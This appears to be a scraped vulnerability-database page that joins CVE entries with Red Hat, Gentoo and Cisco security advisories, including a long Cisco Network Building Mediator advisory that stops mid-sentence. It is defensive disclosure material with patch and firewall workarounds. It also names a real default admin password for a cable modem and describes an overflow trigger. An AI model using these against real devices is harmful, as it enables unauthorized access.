subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1752.html
https://www.redhat.com/security/data/cve/CVE-2011-1783.html
https://www.redhat.com/security/data/cve/CVE-2011-1921.html
https://access.redhat.com/security/updates/classification/#moderate
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFN75utXlSAg2UNWIIRAuXgAJ9fhhY1xxC7jRZbLGZA6ENr3dnTBQCgkdf0
J9nA8MJRlM/XVtyj3mbVErg=
=jujC
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. The Common Vulnerabilities and Exposures project
identifies the following problems:
CVE-2011-1752
The mod_dav_svn Apache HTTPD server module can be crashed though
when asked to deliver baselined WebDAV resources.
For the oldstable distribution (lenny), this problem has been fixed in
version 1.5.1dfsg1-7.
For the stable distribution (squeeze), this problem has been fixed in
version 1.6.12dfsg-6.
For the unstable distribution (sid), this problem has been fixed in
version 1.6.17dfsg-1
| VAR-201006-0502 | No CVE | Bftpd anonymous account bypass ROOTDIR security restriction vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Bftpd is a small FTP server. When bftpd handles anonymous logins, the ROOTDIR option specified in the configuration file may be ignored, allowing users to bypass the restrictions to gain read and write access to any file or directory on the system. Bftpd is prone to a security-bypass vulnerability that arises due to an access-validation error.
Exploiting this issue can allow an attacker to download or upload arbitrary files outside of the FTP server root directory. This may aid in further attacks.
The issue affects versions prior to Bftpd 2.9
| VAR-201006-0451 | CVE-2010-2428 | Windows For Wing FTP Server of Administrator Web Interface cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request. Wing FTP server is a multi-protocol file server that supports HTTP and FTP. The Wing FTP server's Administrator console interface (http://x.x.x.x:5466/admin_loginok.html port is 5466) does not properly filter user-submitted requests. A remote attacker can perform a cross-site scripting attack by submitting a special build POST request. Wing FTP Server is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible
| VAR-201007-0247 | CVE-2010-2659 | Opera Vulnerability where important information is obtained |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site. Opera Web Browser is prone to multiple security vulnerabilities, including:
Multiple denial-of-service vulnerabilities
A security-bypass vulnerability
An information-disclosure vulnerability
An attacker can exploit these issues to cause a denial-of-service condition, gain access to sensitive information and bypass certain security restrictions. Other attacks are also possible.
Versions prior to Opera 10.60 are vulnerable. It supports multi-window browsing and a customizable user interface. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201206-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Opera: Multiple vulnerabilities
Date: June 15, 2012
Bugs: #264831, #283391, #290862, #293902, #294208, #294680,
#308069, #324189, #325199, #326413, #332449, #348874,
#352750, #367837, #373289, #381275, #386217, #387137,
#393395, #409857, #415379, #421075
ID: 201206-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Opera, the worst of which
allow for the execution of arbitrary code.
Background
==========
Opera is a fast web browser that is available free of charge.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/opera < 12.00.1467 >= 12.00.1467
Description
===========
Multiple vulnerabilities have been discovered in Opera. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted web
page, possibly resulting in execution of arbitrary code with the
privileges of the process or a Denial of Service condition. A remote
attacker may be able to: trick users into downloading and executing
arbitrary files, bypass intended access restrictions, spoof trusted
content, spoof URLs, bypass the Same Origin Policy, obtain sensitive
information, force subscriptions to arbitrary feeds, bypass the popup
blocker, bypass CSS filtering, conduct cross-site scripting attacks, or
have other unknown impact.
A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application or
possibly obtain sensitive information.
A physically proximate attacker may be able to access an email account.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Opera users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/opera-12.00.1467"
References
==========
[ 1 ] CVE-2009-1234
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1234
[ 2 ] CVE-2009-2059
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2059
[ 3 ] CVE-2009-2063
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2063
[ 4 ] CVE-2009-2067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2067
[ 5 ] CVE-2009-2070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2070
[ 6 ] CVE-2009-3013
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3013
[ 7 ] CVE-2009-3044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3044
[ 8 ] CVE-2009-3045
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3045
[ 9 ] CVE-2009-3046
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3046
[ 10 ] CVE-2009-3047
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3047
[ 11 ] CVE-2009-3048
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3048
[ 12 ] CVE-2009-3049
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3049
[ 13 ] CVE-2009-3831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3831
[ 14 ] CVE-2009-4071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4071
[ 15 ] CVE-2009-4072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4072
[ 16 ] CVE-2010-0653
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0653
[ 17 ] CVE-2010-1349
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1349
[ 18 ] CVE-2010-1989
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1989
[ 19 ] CVE-2010-1993
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1993
[ 20 ] CVE-2010-2121
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2121
[ 21 ] CVE-2010-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2421
[ 22 ] CVE-2010-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2455
[ 23 ] CVE-2010-2576
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2576
[ 24 ] CVE-2010-2658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2658
[ 25 ] CVE-2010-2659
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2659
[ 26 ] CVE-2010-2660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2660
[ 27 ] CVE-2010-2661
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2661
[ 28 ] CVE-2010-2662
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2662
[ 29 ] CVE-2010-2663
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2663
[ 30 ] CVE-2010-2664
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2664
[ 31 ] CVE-2010-2665
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2665
[ 32 ] CVE-2010-3019
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3019
[ 33 ] CVE-2010-3020
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3020
[ 34 ] CVE-2010-3021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3021
[ 35 ] CVE-2010-4579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4579
[ 36 ] CVE-2010-4580
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4580
[ 37 ] CVE-2010-4581
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4581
[ 38 ] CVE-2010-4582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4582
[ 39 ] CVE-2010-4583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4583
[ 40 ] CVE-2010-4584
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4584
[ 41 ] CVE-2010-4585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4585
[ 42 ] CVE-2010-4586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4586
[ 43 ] CVE-2011-0681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0681
[ 44 ] CVE-2011-0682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0682
[ 45 ] CVE-2011-0683
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0683
[ 46 ] CVE-2011-0684
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0684
[ 47 ] CVE-2011-0685
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0685
[ 48 ] CVE-2011-0686
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0686
[ 49 ] CVE-2011-0687
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0687
[ 50 ] CVE-2011-1337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1337
[ 51 ] CVE-2011-1824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1824
[ 52 ] CVE-2011-2609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2609
[ 53 ] CVE-2011-2610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2610
[ 54 ] CVE-2011-2611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2611
[ 55 ] CVE-2011-2612
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2612
[ 56 ] CVE-2011-2613
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2613
[ 57 ] CVE-2011-2614
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2614
[ 58 ] CVE-2011-2615
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2615
[ 59 ] CVE-2011-2616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2616
[ 60 ] CVE-2011-2617
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2617
[ 61 ] CVE-2011-2618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2618
[ 62 ] CVE-2011-2619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2619
[ 63 ] CVE-2011-2620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2620
[ 64 ] CVE-2011-2621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2621
[ 65 ] CVE-2011-2622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2622
[ 66 ] CVE-2011-2623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2623
[ 67 ] CVE-2011-2624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2624
[ 68 ] CVE-2011-2625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2625
[ 69 ] CVE-2011-2626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2626
[ 70 ] CVE-2011-2627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2627
[ 71 ] CVE-2011-2628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2628
[ 72 ] CVE-2011-2629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2629
[ 73 ] CVE-2011-2630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2630
[ 74 ] CVE-2011-2631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2631
[ 75 ] CVE-2011-2632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2632
[ 76 ] CVE-2011-2633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2633
[ 77 ] CVE-2011-2634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2634
[ 78 ] CVE-2011-2635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2635
[ 79 ] CVE-2011-2636
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2636
[ 80 ] CVE-2011-2637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2637
[ 81 ] CVE-2011-2638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2638
[ 82 ] CVE-2011-2639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2639
[ 83 ] CVE-2011-2640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2640
[ 84 ] CVE-2011-2641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2641
[ 85 ] CVE-2011-3388
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3388
[ 86 ] CVE-2011-4065
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4065
[ 87 ] CVE-2011-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4681
[ 88 ] CVE-2011-4682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4682
[ 89 ] CVE-2011-4683
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4683
[ 90 ] CVE-2012-1924
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1924
[ 91 ] CVE-2012-1925
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1925
[ 92 ] CVE-2012-1926
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1926
[ 93 ] CVE-2012-1927
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1927
[ 94 ] CVE-2012-1928
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1928
[ 95 ] CVE-2012-1930
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1930
[ 96 ] CVE-2012-1931
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1931
[ 97 ] CVE-2012-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3555
[ 98 ] CVE-2012-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3556
[ 99 ] CVE-2012-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3557
[ 100 ] CVE-2012-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3558
[ 101 ] CVE-2012-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3560
[ 102 ] CVE-2012-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3561
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201206-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201006-0505 | No CVE | NETGEAR WG602v4 Management Password Remote Stack Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
NETGEAR WG602v4 is a wireless router device. The verification process in the WEB interface of the NETGEAR WG602v4 device has a buffer overflow, and an attacker can exploit the vulnerability to stop the device from responding. The auth_authorize() function handles this process by submitting an administrator password of more than 128 characters to trigger a buffer overflow. The NETGEAR WG602v4 is prone to a remote stack-based buffer-overflow vulnerability because the device fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition
| VAR-201101-0004 | CVE-2009-5037 |
Cisco Adaptive Security Appliances Service disruption on devices (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201005-1242 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) allow remote attackers to cause a denial of service (ASDM syslog outage) via a long URL, aka Bug IDs CSCsm11264 and CSCtb92911. The problem is Bug IDs CSCsm11264 and CSCtb92911 It is a problem.Too long by a third party URL Through service disruption (DoS) There is a possibility of being put into a state.
An attacker can exploit this issue to cause the affected device to reload, denying service to legitimate users.
This issue is documented in Cisco bug IDs CSCsm11264 and CSCtb92911
| VAR-201005-0138 | CVE-2010-2082 | Cisco Scientific Atlanta WebSTAR DPC2100R2 Cable modem Web Privileged vulnerability in interface |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 has a default administrative password (aka SAPassword) of W2402, which makes it easier for remote attackers to obtain privileged access. The Cisco DPC2100 is a small cable modem
| VAR-201005-0064 | CVE-2010-0595 | Cisco Mediator Framework Vulnerabilities that gain access privileges |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 has a default password for the administrative user account and unspecified other accounts, which makes it easier for remote attackers to obtain privileged access, aka Bug ID CSCtb83495. The problem is Bug ID : CSCtb83495 It is a problem.Access rights may be obtained by a third party. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. There are several security vulnerabilities in Cisco Network Building Mediator, as follows: - Default Authentication Credentials (CVE-2010-0595): Multiple predefined users on the device, including administrator user accounts using default authentication information, any network access device Users can log in to the control system as an administrator.-Privilege Escalation (CVE-2010-0596, CVE-2010-0597): Vulnerability allows unauthorized users to read and modify device configurations, malicious users must be able to successfully authenticate, but do not require administrator privileges Or modify the device configuration if you know the administrator to verify the credentials. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): Operator workstation Cisco Network Building Mediator did not protect unauthorized interception of sessions, malicious users could intercept sessions, obtain arbitrary authentication information, and use this information to control devices. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Attackers can perform attacks and read configuration files via XML RPC or XML RCP over the HTTPS protocol.
An attacker can exploit this issue to gain unauthorized administrative access to the affected device. Successful exploits will result in the complete compromise of the affected device. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. All Mediator Framework software releases prior to 3.1.1 are
affected by all vulnerabilities listed in this security advisory.
This table provides information about affected software releases:
+---------------------------------------+
| Cisco Bug | Affects Software |
| ID | Releases |
|-------------+-------------------------|
| CSCtb83495 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83607 | 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83618 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83631 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83505 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83512 | 1.5.1, 2.2, 3.0.8 |
+---------------------------------------+
Vulnerable Products
+------------------
Users can determine the version of the Mediator Framework running on
a device by logging into the device. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
